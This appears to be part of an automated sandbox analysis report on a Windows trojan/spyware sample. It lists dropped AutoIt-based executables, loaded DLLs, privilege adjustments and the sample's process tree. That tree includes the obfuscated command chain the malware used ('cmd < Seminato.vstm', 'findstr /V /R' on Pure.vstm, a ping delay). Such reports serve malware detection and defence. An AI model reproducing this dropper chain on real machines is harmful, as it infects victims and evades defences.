Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AD84007_2_00AD8400
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A865027_2_00A86502
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A5E6F07_2_00A5E6F0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A8265E7_2_00A8265E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7282A7_2_00A7282A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A889BF7_2_00A889BF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AD0A3A7_2_00AD0A3A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A86A747_2_00A86A74
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A60BE07_2_00A60BE0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AAEDB27_2_00AAEDB2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7CD517_2_00A7CD51
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AD0EB77_2_00AD0EB7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00AB8E447_2_00AB8E44
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A86FE67_2_00A86FE6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A733B77_2_00A733B7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7F4097_2_00A7F409
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A6D45D7_2_00A6D45D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A5F6A07_2_00A5F6A0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A716B47_2_00A716B4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A6F6287_2_00A6F628
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A516637_2_00A51663
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A778C37_2_00A778C3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7DBA57_2_00A7DBA5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A71BA87_2_00A71BA8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A89CE57_2_00A89CE5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A6DD287_2_00A6DD28
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A71FC07_2_00A71FC0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.comCode function: 7_2_00A7BFD67_2_00A7BFD6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003DB02011_2_003DB020
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.comCode function: 11_2_003D94E011_2_003D94E0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003D9C80
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F23F5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00458400
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00406502
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0040265E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003DE6F0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F282A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_004089BF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00406A74
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00450A3A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003E0BE0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FCD51
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_0042EDB2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00438E44
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00450EB7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00406FE6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F33B7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FF409
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003ED45D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003EF628
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003D1663
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F16B4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003DF6A0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F78C3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F1BA8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FDBA5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00409CE5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003EDD28
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003FBFD6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_003F1FC0
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: String function: 00A70D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: String function: 00A61A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: String function: 00A78B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: String function: 00788B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: String function: 00771A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: String function: 00780D17 appears 70 times
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: String function: 0040346A appears 45 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: String function: 003E1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: String function: 003F0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: String function: 003F8B30 appears 42 times
Source: Tt843YGUx5.exe, 00000000.00000002.2108031796.0000000000571000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs Tt843YGUx5.exe
Source: Tt843YGUx5.exe, 00000000.00000003.1680945398.00000000030D9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs Tt843YGUx5.exe
Source: Tt843YGUx5.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Tt843YGUx5.exe, 00000000.00000002.2108031796.000000000051E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBP)T
Source: classification engine | Classification label: mal80.troj.spyw.evad.winEXE@26/14@3/1
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00408E97 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007B8DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AA8DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Code function: 7_2_00AA9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00428DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Code function: 11_2_00429399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00401268 GetDiskFreeSpaceExW,SendMessageW
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Code function: 5_2_007C4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00408906 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_0040220D GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000
Source: Tt843YGUx5.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Tt843YGUx5.exe | Virustotal: Detection: 31%
Source: Tt843YGUx5.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | File read: C:\Users\user\Desktop\Tt843YGUx5.exe
Source: unknown | Process created: C:\Users\user\Desktop\Tt843YGUx5.exe "C:\Users\user\Desktop\Tt843YGUx5.exe"
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Seminato.vstm
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com Inebriarti.exe.com A
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com Bonta.exe.com m
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com A
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com m
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com Pensiero.exe.com E
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com E
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Inebriarti.exe.com | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bonta.exe.com | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Pensiero.exe.com | Section loaded: rasadhlp.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Tt843YGUx5.exe | Static file information: File size 9326758 > 1048576

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^jFsHerEbljXpXySesHEeeiaEbuspVTxTkpsgNBbkUmDsXXeCDHjpLUEthNpWLcCdRtXONEgPpaiDDqGArPGhHlidFhwqaBAmWhASZgPYzbqaMqAjuJSWPfJHXGpA$" Pure.vstm
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_0040760A LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow
Source: Tt843YGUx5.exe | Static PE information: real checksum: 0xf0b0e should be: 0x8e8212
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_3_02587F5C pushfd ; ret 0_3_02587FBC
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_3_02587D9F push ds; retf 0_3_02587DA5
Source: C:\Users\user\Desktop\Tt843YGUx5.exe | Code function: 0_2_00418690 push eax; ret 0_2_004186BE
